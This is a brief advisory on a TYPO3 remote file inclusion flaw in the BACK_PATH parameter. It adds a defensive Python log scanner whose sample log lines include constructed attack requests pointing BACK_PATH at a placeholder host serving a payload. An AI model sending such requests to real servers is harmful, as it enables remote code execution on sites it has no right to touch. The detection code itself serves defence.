The TYPO3 developer team have identified a critical hole in the CMS which could allow an attacker to compromise a server. Insufficient checking of the BACK_PATH parameter in the AbstractController.php file enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The TYPO3 developers have been informed that attackers are already trying to intrude into users' servers on a large scale. The development team have now provided a patch and released the corrected versions 4.5.9 and 4.6.2. If you use TYPO3, we suggest you update immediately.
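Because intrusion attempts are reported to be widespread, it is worth checking web server logs as well as updating. The following is an added example, not TYPO3 code: it flags requests to AbstractController.php whose BACK_PATH parameter carries a URL instead of a local path. It assumes combined-format access logs; the function name, sample path, hosts and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A BACK_PATH value that starts with a URL scheme is not a local relative path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+://|data:)', re.IGNORECASE)


def suspicious_requests(lines):
    """Return (client_ip, BACK_PATH value) for each request to
    AbstractController.php whose BACK_PATH parameter is a URL."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parsable request line
        parts = urlsplit(match.group("target"))
        if not unquote(parts.path).endswith("/AbstractController.php"):
            continue  # only the file named in the advisory is of interest
        # parse_qsl percent-decodes names and values once, as the server would.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == "BACK_PATH" and REMOTE_RE.match(value):
                hits.append((match.group("ip"), value))
    return hits


# Constructed sample lines: documentation-range addresses, placeholder path.
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2012:10:00:01 +0000] '
    '"GET /example-path/AbstractController.php?BACK_PATH=../../ HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2012:10:00:02 +0000] '
    '"GET /example-path/AbstractController.php'
    '?BACK_PATH=http%3A%2F%2Fremote.example%2Fpayload.txt%3F HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2012:10:00:03 +0000] '
    '"GET /example-path/AbstractController.php'
    '?BACK_PATH=ftp://remote.example/x HTTP/1.1" 200 0',
    '198.51.100.21 - - [01/Jan/2012:10:00:04 +0000] '
    '"GET /example-path/other.php?BACK_PATH=http://remote.example/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent BACK_PATH={value!r}")
```

Access logs normally record only the query string, so a BACK_PATH value sent in a POST body will not appear here; a hit is a reason to investigate the server, not proof of compromise.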